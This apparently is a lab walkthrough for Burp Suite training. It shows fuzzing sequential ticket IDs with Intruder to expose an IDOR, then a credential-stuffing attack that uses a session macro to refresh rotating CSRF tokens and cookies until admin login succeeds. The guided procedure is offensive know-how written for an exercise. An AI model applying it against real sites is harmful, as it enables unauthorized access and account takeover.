Practical Challenge

Checking out the rows with clicking on them we can see that the corresponding URLs are simply assigned an integer identifier.

This would allow us to easily fuzz to numbers with using one of the attack types. The target should only allow us to view tickets that are assigned to our current user. If all the existing tickets can be read by any user logged in then a vulnerability called IDOR (Insecure Direct Object References) is present. Now, let’s find an appropriate position and payload and with this we could also answer the first question of this section.

Which attack type is best suited for this task?

After this, the responses only with the status code of 200 should be examined to reveal our flag.

What is the flag?

Extra Mile CSRF Token Bypass

Let’s make another but a bit more sophisticated credential stuffing attack now starting by catching a request against the login page. There is a session cookie set in the response and a CSRF (Cross-Site Request Forgery) token included in the form as a hidden field. Both the session cookie and the token change every time when the page is refreshed which means unique values are required upon every login attempt.

Now, let’s pass the captured login request to Intruder again and set only the username and password fields for the positions with the attack type Pitchfork. After this let’s load the same username and password lists as we did for the previous Pitchfork attack above.

Now, a macro needs to be applied  to send a GET request to [/admin/login/], because the loginToken and session cookie change with each page refresh. Let’s navigate “Project options” -> Sessions and at the bottom of the page click “Add” a macro.

After this let’s find our target URL in the “Macro Recorder” and then we could change the description of it in the “Macro Editor” as well.

Now that macro is defined “Session Handling” rules should be specified about the usage of it. On the top of the exact same Burp Suite page in the “Session Handling Rules” let’s add a new rule in the “Sessions” subtab then update the “Rule Description”.

After this  switch over to the Scope tab and for the “Tools Scope” only keep the “Intruder” and for the “URL scope” switch on the “Use suite scope [defined in Target tab]” if it is defined there earlier. If it’s not there we could add the same here as “Custom scope”.

Now, the macro needs to be added (we receive a “lack of action” warning anyway if closing the “Session handling rule editor” window without adding any). If it is closed hit “Edit” and in the “Rule Actions” section chose “Run a macro” from the dropdown menu.

Then in the editor “loginToken” parameters and “session” cookies should be set to be updated.

Now, let’s switch back to the Intruder and we can initiate our attack. We got back 302 redirect errors but one of the responses should stand out as before being a lot shorter than the others.

Yes. We are in as admin..

Thanks for reading and as always, any feedback is most welcome.